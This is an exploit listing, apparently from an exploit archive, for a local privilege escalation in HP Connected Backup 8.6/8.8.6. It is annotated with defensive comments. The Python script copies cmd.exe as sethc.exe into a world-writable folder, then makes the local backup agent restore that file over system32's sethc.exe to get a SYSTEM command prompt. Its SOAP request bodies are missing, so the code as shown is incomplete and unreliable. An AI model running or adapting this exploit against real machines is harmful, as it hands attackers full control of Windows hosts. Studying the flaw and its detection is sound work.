HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation

Properties

Published:
24.01.2018
Target:
HP Connected Backup 8.6/8.8.6

Code

#Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64
 
import os
import sys
import time
import requests
from bs4 import BeautifulSoup
 
def send_request(body):
    """Post one SOAP request body to the local Connected Backup agent.

    body -- the request payload, sent verbatim as the POST data.
    Returns response.text when the agent answers HTTP 200. On any other
    status it prints a fixed message and calls sys.exit(), so callers
    never see a non-200 result or the server's error body.

    Written in Python 2 syntax (print statement), like the rest of the
    listing.
    """
    # The URL targets the agent over loopback on port 16386, i.e. it is
    # reachable from any local account. Nothing in the request is
    # per-session or secret: the session identifier below is a constant
    # literal. A local privileged service that honours a fixed identifier
    # is effectively unauthenticated to every user on the host, which is
    # what appears to make the escalation possible; the fix on the service
    # side is a per-session, per-user credential check.
    url="http://localhost:16386/"
    # NOTE(review): "Set-Cookie" is a response header, yet it is sent here as
    # a request header carrying "CCSessionID=SessionID11". Whether the agent
    # actually reads this value or ignores it cannot be told from the listing.
    headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"}
    response = requests.post(url, data=body, headers=headers)
    if response.status_code != requests.codes.ok:
        # Fails closed without detail: status code and body are discarded.
        print "Non-200 response. Exiting..."
        sys.exit()
    else:
        return response.text
         
         
def get_tdate(response):
    """Return the text of the first <m-tdate> element in a SOAP response.

    response -- raw response text, as returned by send_request().
    Returns the .string of the first "m-tdate" element. If no such element
    is present, findAll() returns an empty list and the [0] index raises
    IndexError, so the script aborts here with a traceback rather than a
    message.
    """
    # html.parser lowercases tag names, so the lowercase search string
    # matches the element that the comments below call m-TDate.
    soup = BeautifulSoup(response, "html.parser")
    tdate = soup.findAll("m-tdate")[0].string
    return tdate
     
# Main sequence. Every send_request() call below receives a triple-quoted
# string whose XML/SOAP envelope is missing (several are the empty string
# """""" and the others hold only the inner values), so the request markup
# appears to have been stripped when this listing was extracted: as shown,
# the listing is incomplete and does not issue valid requests. What remains
# documents the sequence the backup agent accepted from an unprivileged
# local user: start a scan, include an attacker-controlled file, run a
# backup, then restore that file to an alternate path inside
# C:\Windows\system32, overwriting an existing binary, with the restore
# performed by the agent's own (SYSTEM) process.
#
# Defensive notes (grounded in the steps below):
#   - The cookie/session value and the restore target are attacker-chosen;
#     the agent enforces neither the caller's identity nor the destination.
#   - A restore that writes into %SystemRoot%\System32 from a world-writable
#     staging folder (C:\hpcb-privesc) is the event to alert on: file
#     creation of sethc.exe in system32 by the backup service, preceded by a
#     backup set that suddenly includes a file under a fresh top-level folder.
#   - Hardening on the service side is a per-user authentication check on
#     the local SOAP port and refusing alternate restore paths under
#     protected system directories.
#Copy cmd.exe to world-writeable folder
print "HP Connected Backup Privilege Escalation by Peter Lapp(lappsec)"
print "Copying cmd.exe to C:\\hpcb-privesc"
# Shell commands via os.system(); return codes are not checked, so a failed
# mkdir/copy is only discovered later when the backup or restore fails.
os.system("mkdir C:\\hpcb-privesc")
os.system("copy C:\\Windows\\system32\\cmd.exe C:\\hpcb-privesc\\sethc.exe")
         
print "Creating backup for C:\\hpcb-privesc\\sethc.exe"
 
#StartScan required before IncludeFile request will be accepted
# Body is empty here -- the SOAP envelope did not survive extraction.
send_request("""""")
 
time.sleep(3)
 
#Add file to backup
# The base64 value decodes to the staged path C:\hpcb-privesc\sethc.exe;
# the trailing "true" is an inner element value whose tag is missing.
send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==true""")
 
 
print "Initiating Backup"
#Start backup
 
send_request("""""")
 
# Fixed wait instead of polling for completion; the message below tells the
# reader to raise it if the later steps fail.
print """Sleeping for 300 seconds to give time for backup to complete. 
If the script fails after this then change the sleep period to give the backup enough time to complete"""
 
time.sleep(300)
 
print "Initiating restore"
#PrepareRetrieve requires valid PID of process running as SYSTEM. PID 456 is common for Windows 7 but if it fails, try another
# The PID is a hard-coded guess and is not validated here; a wrong value is
# only noticed as a non-200 response from send_request().
 
send_request("""456""")
 
#We have to get the m-TDate value for the file in order for the restore to work correctly
print "Getting m-TDate value"
# The base64 value decodes to the staging folder C:\hpcb-privesc\ (a
# directory listing, not the file itself).
fileinfo = send_request("""QzpcaHBjYi1wcml2ZXNjXA==""")
# get_tdate() raises IndexError if the response carries no m-tdate element.
tdate = get_tdate(fileinfo)
 
print "Adding Restore file"
 
# Same base64 file path as the include step; tdate is spliced between the
# remaining (tag-less) inner values.
send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==false"""+tdate+"""""")
 
 
print "Setting alternate restore path to C:\\Windows\\system32\\"
 
# Backslashes are not doubled on this line; Python leaves unknown escapes
# such as \W and \s untouched, so the literal still reads C:\Windows\system32.
# The agent accepting a restore destination inside system32 is the missing
# server-side check.
send_request("""C:\Windows\system32false""")
 
 
#Set restore to replace existing file
send_request("""true""")
 
print "Restoring C:\\hpcb-privesc\\sethc.exe to C:\\Windows\\system32\\sethc.exe"
# The agent, not this script, performs the write into system32.
send_request("""""")
 
print "If it made it this far without an error, then you should now be able to log out, press SHIFT 5 times and be given a command prompt as SYSTEM. Enjoy!"